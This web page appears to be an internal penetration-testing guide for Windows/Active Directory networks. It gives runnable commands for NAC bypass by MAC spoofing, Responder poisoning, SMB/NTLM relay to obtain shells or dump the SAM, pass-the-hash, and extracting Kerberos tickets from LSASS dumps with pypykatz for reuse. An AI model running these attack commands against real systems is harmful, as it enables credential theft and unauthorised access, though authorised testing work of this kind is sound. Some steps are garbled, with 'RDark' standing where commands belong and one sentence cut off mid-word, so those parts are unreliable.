Skip to content

Internal Penetration Testing Guide

Internal Penetration Testing Guide

https://book.hacktricks.xyz/pentesting/pentesting-network

Additional Tools
The following tools are not installed by default in the prerequisite toolset, but provide significant value in certain scenarios during testing:
- Bloodhound
- PowerSploit
- CrackMapExec
- Empire (Outdated)
- Apfell A cross-platform, post-exploit, red teaming framework built with python3, docker, docker-compose, and a web browser UI.
- Covenant is a .NET command and control framework the newer Empire
- Silver a Golang C2 framework
- Faction
- KeeThief
- UAC Bypass
- https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC
- https://github.com/FuzzySecurity/DefCon25
- Impacket
- Automation for internal Windows Penetrationtest / AD-Security
- Better netcat shell

Logging Configuration

Windows (PowerShell):
The PowerShell file below will automatically load and execute whenever a PowerShell prompt is opened. This will maintain persistent logging/history of PowerShell commands (with and without timestamps).

  1. Create the following file:

    C:\Users\[USERNAME]\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

  2. Save the following PowerShell code to this file:

    # Set file/folder to save history
$HistoryFilePath = "$([Environment]::GetFolderPath('UserProfile'))\PowerShellLogs\ps_history-$(Get-Date -f MM-dd-yyyy).txt"
$HistoryFilePathTimeStamped = "$([Environment]::GetFolderPath('UserProfile'))\PowerShellLogs\Timestamped\ps_history-TIMESTAMPED-$(Get-Date -f MM-dd-yyyy).txt"
# Output history destination file/folder to stdout
write-host "History will be written to the following files upon exiting: "
write-host "$HistoryFilePath" -foregroundcolor "green"
write-host "$HistoryFilePathTimeStamped" -foregroundcolor "green"
# Upon exit, dump history to file
Register-EngineEvent PowerShell.Exiting -Action {
    Get-Date -Format g | Out-File -FilePath $HistoryFilePath -Append
    Get-History | Out-File -FilePath $HistoryFilePath -Append
} | out-null
# Upon exit, dump history with timestamps to file
Register-EngineEvent PowerShell.Exiting -Action {
    Get-History | FL | Out-File -FilePath $HistoryFilePathTimeStamped -Append
} | out-null
# Adds ability to scroll history using up/down keys
Set-PSReadlineKeyHandler -Key UpArrow -Function HistorySearchBackward
Set-PSReadlineKeyHandler -Key DownArrow -Function HistorySearchForward

Metasploit:
The configuration file described below will automatically run whenever msfconsole is launched. This will ensure a history is kept (both input and output) of both standard MSF commands/modules, but also sessions (e.g., Meterpreter shell).

  1. Create the following file:
    >>> head -n 8 /root/.msf4/msfconsole.rc
#[framework/core]
setg SessionLogging true
setg TimestampOutput true
setg ConsoleLogging true
setg LogLevel 3
setg PROMPT [%yel%T%whi] { %grnS:%S J:%J%whi} %whi%W
spool /root/.msf4/logs/spool.log
#[framework/ui/console]

Network Access Control (NAC) Testing

Check if you get an address from DHCP if not then there may be a NAC.

MAC Filtering Bypass

Get Mac address from Other devices including VoIP Phones

Set Mac Address:

macchanger --mac=XX:XX:XX:XX:XX:XX eth0

IPv6 Traffic Exclusion

Utilize nmap's "-6" option and/or Metasploit's "ipv6_multicast_ping" and "ipv6_neighbor" modules for IPv6 host discovery, as some NAC solutions strictly focus on IPv4 traffic.

List IPV6 addresses with Metasploit:

sudo msfconsole -q
msf > use auxiliary/scanner/discovery/ipv6_multicast_ping
msf auxiliary(ipv6_multicast_ping) > set RHOSTS fe80::4dc4:bd17:56a1:a472/64
msf auxiliary(ipv6_multicast_ping) > run
[*] Running module against fe80::
[*] Sending multicast pings...
[*] Listening for responses...
[*]    |*| fe80::103a:5e16:5a41:6687 => 36:d0:0d:4b:26:64

Scan IPv6 addresses with Nmap:

nmap -6 -sV fe80::103a:5e16:5a41:6687

Dedicated NAC Bypass Device (Intrusive)

A dedicated physical device (e.g., Pwnplug) can be connected to a target machine and configured to bypass the implemented NAC mechanism.

Passive Reconnaissance / Information Gathering

Responder

Use the forked Responder.

Hashes Sored in /usr/share/responder/logs/[PROTOCOL]-[HASHTYPE]-[IPADDRESS].txt

Check for LLMNR/NBT-NS Requests:

responder -A -I [interface]

Actively Poison LLMNR/NBT-NS Requests:

responder -I [interface]

Credential Theft/Reuse

SMB/NetNTLM Relay

If the Host has SMB Message Signing disabled then it is possible to relay Credentials. The destination also needs SMB Message Signing disabled also. By default Non Server Windows have SMB Signing disabled by default.

Since MS08-068 it is not possible to relay credentials back to the same machine on the same protocol.

Testing for SMB Message Signing Nmap:

nmap -sS -Pn -n -p 139,445 --script smb-security-mode [TARGETSUBNET]

Testing for SMB Message Signing Responder:

python /usr/share/responder-multirelay/tools/RunFinger.py -g -i [TARGETSUBNET]

Testing for SMB Message Signing CrackMapExec:

cme smb [TARGETSUBNET] --gen-relay-list [OUTPUTFILE]

Other service testing with responder: 

root@kali:/etc/responder# head -15 Responder.conf
[Responder Core]
; Servers to start
SQL = On
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On

Responder with Redirections:

responder -I [INTERFACE] -rv

Using Responder to get shells:
Running the MultiRelay command below will result in a shell if a relayed authentication request is successful.
the -u parameter allows all users to be relayed

python /usr/share/responder/tools/MultiRelay.py -t [TARGETIP] -u ALL
# Single User Relay
python /usr/share/responder/tools/MultiRelay.py -t [TARGETIP] -u Admin

Impacket Powershell Command:

#If no command is provided the SAM database will be dumped by default.
python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf [TARGETSFILE] -c [EMPIRE POWERSHELL LAUNCHER COMMAND]

  1. The resulting MultiRelay shell offers extended functionality, detailed in Laurent Gaffie's blog post, including remote Mimikatz commands.

Pass-the-Hash (PTH)

This technique requires a previously compromised NTLM/LM hash of an account's password. Note that this cannot be done using NetNTLM/NTLMv1/NTLMv2 hashes that are collected using Responder or similar tools.

  1. Compromise an NTLM/LM hash
  2. Determine which machines the corresponding account (for the hash) has access to. This can be done in several ways:
    1. Leverage Active Directory reconnaissance techniques to enumerate a list of logged on users for all target machines. This is best accomplished using PowerView, which is one of the Recon modules of PowerSploit. S

Mimikatz

pypykatz

Mimikatz implementation in pure Python.

Dumping Kerberos Tickers from a dump file:

>>> pypykatz lsa -k /root/data/kerberos minidump lsass.dmp
INFO:root:Parcing file lsass.dmp
FILE: ========= lsass.dmp =======
[...]
>>> ls /root/data/kerberos
lsass.dmp_768ec70d.ccache
TSG_WINLAB.COM_CLIENT01$_krbtgt_WINLAB.COM-dc16ff32.kirbi
[...]

Viewing Kerberos Tickets:

>>> kirbi2ccache TSG_WINLAB.COM_CLIENT01$_krbtgt_WINLAB.COM-dc16ff32.{kirbi,ccache}
>>> export KRB5CCNAME=/path/to/.ccache
>>> klist
Ticket cache: FILE:/root/data/kerberos/Admin.ccache
Default principal: [email protected]

Valid Starting       Expires              Service Principal
11/21/2019 20:39:01  11/22/2019 06:39:01  krbtgt/[email protected]
        renew until 11/28/2019 20:39:01

Using Kerberos Tickets:

>>> wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn

Mimipenguin

A tool to dump the login passwords from memory

Active Directory Reconnaissance

Use Domain Account Without Domain-Joined Computer

Using a compromise domain user account, you can leverage the following technique to execute commands that interact with the target domain without using a domain-joined machine. Instead, you can run commands direclty within your Windows testing machine/VM.

  1. Launch a command prompt (cmd.exe)

  2. Execute the following command. Note that the "PROGRAM" argument can be any program on your machine/VM, including cmd.exe, powershell.exe, mimikatz, etc. In this example, we'll launch cmd.exe and subsequently PowerShell (bypassing the execution policy using "-exec bypass").

    RDark

  3. Enter the account password

  4. Execute the following commands:

    powershell RDark

  5. You can then confirm that you are running as the authenticated domain user within the target domain by issuing the following command:

    powershell RDark